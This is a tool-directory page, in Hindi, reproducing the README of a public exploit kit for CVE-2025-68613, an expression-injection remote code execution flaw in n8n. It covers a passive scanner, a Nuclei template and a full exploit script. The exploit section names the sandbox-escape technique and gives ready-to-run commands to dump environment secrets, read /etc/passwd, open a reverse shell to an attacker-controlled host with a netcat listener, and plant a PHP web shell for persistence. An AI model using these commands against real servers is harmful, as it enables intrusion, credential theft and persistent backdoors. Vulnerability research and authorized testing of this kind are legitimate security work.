Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-68613-POC — CVE-2025-68613 के लिए सार्वजनिक PoC + स्कैनर और शोध: n8n वर्कफ़्लो ऑटोमेशन में एक्सप्रेशन इंजेक्शन के माध्यम से क्रिटिकल RCE (CVSS 10.0)। इसमें डिटेक्शन टूल, पूर्ण एक्सप्लॉइट और सुधार मार्गदर्शन शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/thestingr/cve-2025-68613-poc
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
26219 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
thestingr/cve-2025-68613-poc

CVE-2025-68613-POC

CVE-2025-68613 के लिए सार्वजनिक PoC + स्कैनर और शोध: n8n वर्कफ़्लो ऑटोमेशन में एक्सप्रेशन इंजेक्शन के माध्यम से क्रिटिकल RCE (CVSS 10.0)। इसमें डिटेक्शन टूल, पूर्ण एक्सप्लॉइट और सुधार मार्गदर्शन शामिल हैं।

रिपॉजिटरी देखें

🚨 CVE-2025-68613: n8n में गंभीर RCE भेद्यता

Language: Python CVSS Score: 10.0 Critical Exploit Status: Proof of Concept Available CVE Status: CVE-2025-68613 Disclosed Version: v1.0.2 Target Platform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

विषय सूची

  1. अवलोकन
  2. n8n क्या है?
  3. भेद्यता मूल बातें
  4. तकनीकी विवरण
  5. प्रभावित संस्करण
  6. शोषण तंत्र
  7. वास्तविक दुनिया पर प्रभाव
  8. पता लगाने के तरीके
  9. सुधार और शमन
  10. संसाधन और संदर्भ

अवलोकन

CVE-2025-68613 एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है जो n8n में खोजी गई है, जो एक लोकप्रिय ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है। यह भेद्यता प्रमाणित उपयोगकर्ताओं को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है, जिससे संभावित रूप से पूरा सिस्टम समझौता हो सकता है।

त्वरित तथ्य

  • CVE ID: CVE-2025-68613
  • CVSS स्कोर: 9.9 - 10.0 (गंभीर)
  • भेद्यता प्रकार: एक्सप्रेशन इंजेक्शन → रिमोट कोड निष्पादन
  • CWE: CWE-913 (गतिशील रूप से प्रबंधित कोड संसाधनों का अनुचित नियंत्रण)
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण आवश्यक: हाँ (निम्न विशेषाधिकार - कोई व्यवस्थापक पहुंच आवश्यक नहीं) |- स्थिति: प्रूफ ऑफ कॉन्सेप्ट उपलब्ध (v1.121.0 पर काम करने की पुष्टि)

n8n क्या है?

n8n एक ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है जो उपयोगकर्ताओं को अनुमति देता है:

  • विभिन्न API, डेटाबेस और सेवाओं को कनेक्ट करना
  • दोहराए जाने वाले व्यावसायिक प्रक्रियाओं को स्वचालित करना
  • व्यापक कोडिंग के बिना जटिल वर्कफ़्लो बनाना
  • ऑन-प्रिमाइसेस या क्लाउड में तैनात करना

n8n महत्वपूर्ण बुनियादी ढांचा क्यों है

संगठन n8n का उपयोग करते हैं:

  • डेटाबेस को क्लाउड सेवाओं के साथ एकीकृत करना
  • डेटा प्रोसेसिंग पाइपलाइनों को स्वचालित करना
  • CRM, ERP और आंतरिक प्रणालियों को कनेक्ट करना
  • संवेदनशील डेटा और API क्रेडेंशियल्स का प्रबंधन करना

आईटी बुनियादी ढांचे में यह केंद्रीय भूमिका भेद्यताओं को विशेष रूप से खतरनाक बनाती है, क्योंकि वे हमलावरों को पूरे नेटवर्क और संवेदनशील डेटा तक पहुंच प्रदान कर सकती हैं।


इस रिपॉजिटरी में उपकरण

इस रिपॉजिटरी में भेद्यता का पता लगाने और शोषण परीक्षण के लिए उपयोग के लिए तैयार उपकरण शामिल हैं:

1. स्कैनर: cve-2025-68613-scanner.py

उद्देश्य: कमजोर n8n इंस्टेंसेस का सुरक्षित, गैर-शोषणकारी पता लगाना

विशेषताएं:

  • HTTP प्रतिक्रियाओं से निष्क्रिय संस्करण पता लगाना
  • कोई प्रमाणीकरण आवश्यक नहीं
  • कोई पेलोड निष्पादन नहीं
  • कई सामान्य पथों की जाँच करता है (/, /rest/settings, /healthz, /api/v1/health)
  • अधिकृत सुरक्षा आकलन के लिए सुरक्षित

उपयोग:```bash python3 cve-2025-68613-scanner.py -u http://target:5678

**आउटपुट**:
- निकास कोड 0: असुरक्षित नहीं
- निकास कोड 1: संस्करण अनिर्धारित (शायद पैच किया गया या छिपा हुआ)
- निकास कोड 2: असुरक्षित संस्करण पाया गया

### 2. न्यूक्ली टेम्पलेट: `CVE-2025-68613.yaml`
**उद्देश्य**: स्वचालित भेद्यता पता लगाना और बुनियादी अभिव्यक्ति मूल्यांकन परीक्षण

**विशेषताएं**:
- मान्य प्रमाणीकरण टोकन आवश्यक है
- अभिव्यक्ति इंजेक्शन क्षमता का परीक्षण करता है
- Node.js वैश्विक संदर्भ (process.platform) को पढ़ने का प्रयास करता है
- RCE वेक्टर को मान्य करने के लिए कार्यप्रवाह बनाता है
- CVSS 10.0 गंभीरता वर्गीकरण

**उपयोग**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. पूर्ण शोषण: exploit_cve-2025-68613.py

उद्देश्य: पूर्ण प्रमाण-सिद्धांत शोषण जिसमें कई आक्रमण पेलोड हैं

विशेषताएँ:

  • पूर्ण प्रमाणीकरण संचालन
  • कई शोषण पेलोड:
    • info: सिस्टम जानकारी एकत्र करें (OS, architecture, Node.js version, current user)
    • cmd: मनमाना सिस्टम कमांड निष्पादित करें
    • env: सभी पर्यावरण चर निकालें (क्रेडेंशियल, API कुंजी, गुप्त डेटा प्रकट करता है)
    • read: फाइलसिस्टम से संवेदनशील फ़ाइलें पढ़ें (SSH कुंजी, कॉन्फ़िग फ़ाइलें, आदि)
    • write: फाइलसिस्टम में फ़ाइलें लिखें (स्थायित्व, बैकडोर, आदि)
    • revshell: इंटरैक्टिव पहुंच के लिए रिवर्स शेल कनेक्शन स्थापित करें
  • स्वचालित वर्कफ़्लो सफाई
  • त्रुटि प्रबंधन और स्थिति रिपोर्टिंग

आवश्यकताएँ:

  • मान्य n8n उपयोगकर्ता क्रेडेंशियल (ईमेल/पासवर्ड)
  • Python 3.6+ और requests लाइब्रेरी के साथ
  • लक्ष्य n8n इंस्टेंस तक नेटवर्क पहुंच

स्थापना:```bash pip install requests chmod +x exploit_cve-2025-68613.py

**उपयोग उदाहरण**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload write \  
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

यह कैसे काम करता है:

  1. प्रदान की गई साख का उपयोग करके n8n में प्रमाणित होता है
  2. एक्सप्रेशन इंजेक्शन पेलोड के साथ एक दुर्भावनापूर्ण वर्कफ़्लो बनाता है
  3. पेलोड this.constructor.constructor() का उपयोग करके एक्सप्रेशन सैंडबॉक्स से बाहर निकलता है
  4. process.platform या अन्य Node.js API के माध्यम से पेलोड को निष्पादित करता है
  5. वर्कफ़्लो निष्पादन से परिणाम प्राप्त करता है
  6. परीक्षण वर्कफ़्लो को हटाकर सफाई करता है

निकास कोड:

  • 0: सफल शोषण
  • 1: प्रमाणीकरण या शोषण विफल

भेद्यता की मूल बातें

समस्या क्या है?

सरल शब्दों में: n8n उपयोगकर्ताओं को डेटा को गतिशील रूप से संसाधित करने के लिए वर्कफ़्लो में एक्सप्रेशन लिखने की अनुमति देता है। हालाँकि, इन एक्सप्रेशनों का मूल्यांकन उचित सैंडबॉक्सिंग के बिना किया जाता है, जिससे हमलावर इच्छित निष्पादन संदर्भ से बाहर निकल सकते हैं और सर्वर पर मनमाना कोड चला सकते हैं।

मुख्य मुद्दा

जब आप n8n में एक वर्कफ़्लो बनाते हैं, तो आप डेटा में हेरफेर करने के लिए "एक्सप्रेशन" का उपयोग कर सकते हैं। ये एक्सप्रेशन एक प्रतिबंधित वातावरण में चलने वाले होते हैं। हालाँकि, भेद्यता से पता चलता है कि ये एक्सप्रेशन अंतर्निहित सिस्टम तक पहुँच सकते हैं, जिससे हमलावर निम्नलिखित कार्य कर सकते हैं:

  1. सिस्टम कमांड निष्पादित करें
  2. सर्वर पर फ़ाइलें पढ़ें/लिखें
  3. पर्यावरण चर (API कुंजियाँ, पासवर्ड, रहस्य) चुराएं
  4. डेटा संशोधित या हटाएं
  5. दीर्घकालिक पहुँच के लिए स्थिरता स्थापित करें

यह इतना खतरनाक क्यों है

टूल डाउनलोड करें